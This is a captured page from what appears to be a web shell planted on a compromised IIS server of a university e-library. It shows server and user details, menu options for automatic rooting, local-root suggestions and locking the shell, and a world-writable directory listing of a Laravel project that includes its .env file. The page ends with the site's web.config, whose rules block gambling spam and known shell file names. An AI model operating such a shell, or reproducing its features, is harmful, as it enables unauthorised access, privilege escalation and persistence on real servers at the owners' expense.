Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.135.190.163
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
wwwroot /
moocs-fti /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2025-04-26 20:24
Modules
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
app
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
assets
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
bootstrap
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
config
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
database
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
lang
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
public
[ DIR ]
drwxrwxrwx
2025-04-27 12:54
resources
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
routes
[ DIR ]
drwxrwxrwx
2025-04-03 23:37
storage
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
stubs
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
tests
[ DIR ]
drwxrwxrwx
2025-04-03 23:39
vendor
[ DIR ]
drwxrwxrwx
2025-04-03 23:42
.DS_Store
10
KB
-rw-rw-rw-
2025-03-29 23:18
.editorconfig
258
B
-rw-rw-rw-
2024-12-11 18:24
.env
993
B
-rw-rw-rw-
2025-04-20 23:02
.env.example
114
B
-rw-rw-rw-
2025-02-19 20:56
.gitattributes
186
B
-rw-rw-rw-
2024-12-11 18:24
.gitignore
866
B
-rw-rw-rw-
2025-04-01 12:59
README.md
18
B
-rw-rw-rw-
2024-12-11 18:24
artisan
350
B
-rw-rw-rw-
2024-12-11 18:24
composer.json
2.65
KB
-rw-rw-rw-
2025-03-05 18:30
composer.lock
366.38
KB
-rw-rw-rw-
2025-03-05 18:32
modules_statuses.json
118
B
-rw-rw-rw-
2025-03-05 17:35
package-lock.json
483.57
KB
-rw-rw-rw-
2025-02-19 20:56
package.json
794
B
-rw-rw-rw-
2025-02-19 20:47
phpunit.xml
1.16
KB
-rw-rw-rw-
2024-12-11 18:24
pint.json
225
B
-rw-rw-rw-
2024-12-11 18:24
ref.md
154
B
-rw-rw-rw-
2025-03-30 02:40
tailwind.config-backend.js
5.94
KB
-rw-rw-rw-
2025-02-19 20:56
tailwind.config.js
4.38
KB
-rw-rw-rw-
2025-03-05 17:35
vite-module-loader.js
1.43
KB
-rw-rw-rw-
2024-12-11 18:24
vite.config.js
877
B
-rw-rw-rw-
2025-02-19 20:47
web.config
2.77
KB
-rw-rw-rw-
2025-04-04 00:40
Save
Rename
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <staticContent> <mimeMap fileExtension=".webp" mimeType="image/webp" /> </staticContent> <defaultDocument> <files> <clear /> <add value="index.php" /> </files> </defaultDocument> <rewrite> <rules> <!-- Block Suspicious Traffic --> <rule name="Block Suspicious" stopProcessing="true"> <match url=".*" /> <conditions logicalGrouping="MatchAny"> <add input="{HTTP_REFERER}" pattern="(poker|casino|gambling|betting|togel)" /> <add input="{HTTP_USER_AGENT}" pattern="(gacorbot|rtpbot|slot-crawler)" /> <add input="{HTTP_REFERER}" pattern="\.(fun|bio|vip|xyz)([/?]|$)" /> <add input="{HTTP_REFERER}" pattern="(slot66|sl0t66|sl0t\-66)" /> <add input="{HTTP_REFERER}" pattern="(idn\-toto|1dn\-t0t0)" /> <add input="{HTTP_REFERER}" pattern="(alfa_data|4lfa_data)" /> <!-- Shell/Script Injection Blocks --> <add input="{URL}" pattern="(aspx\.aspx|bash\.alfa|perl\.alfa|py\.alfa)" /> <add input="{QUERY_STRING}" pattern="(aspx\.aspx|bash\.alfa|perl\.alfa|py\.alfa)" /> <!-- SEO Spam Patterns --> <add input="{HTTP_REFERER}" pattern="(link\-slot\-gacor|l1nk\-sl0t\-g4c0r)" /> <add input="{HTTP_REFERER}" pattern="(slot\-resmi\-2025|sl0t\-resm1)" /> </conditions> <action type="CustomResponse" statusCode="403" statusReason="Forbidden" /> </rule> <!-- Laravel Standard Rules --> <rule name="Laravel Force public"> <match url="(.*)" ignoreCase="false" /> <action type="Rewrite" url="public/{R:1}" /> </rule> <rule name="Laravel Routes" stopProcessing="true"> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" /> </conditions> <match url="^" ignoreCase="false" /> <action type="Rewrite" url="public/index.php" /> </rule> </rules> </rewrite> <!-- Security Headers --> <httpProtocol> <customHeaders> <add name="X-Frame-Options" value="SAMEORIGIN" /> <add name="X-Content-Type-Options" value="nosniff" /> <add name="Referrer-Policy" value="strict-origin-when-cross-origin" /> </customHeaders> </httpProtocol> <!-- Protect Sensitive Files --> <security> <requestFiltering> <hiddenSegments> <add segment=".env" /> <add segment="composer.json" /> <add segment="composer.lock" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration>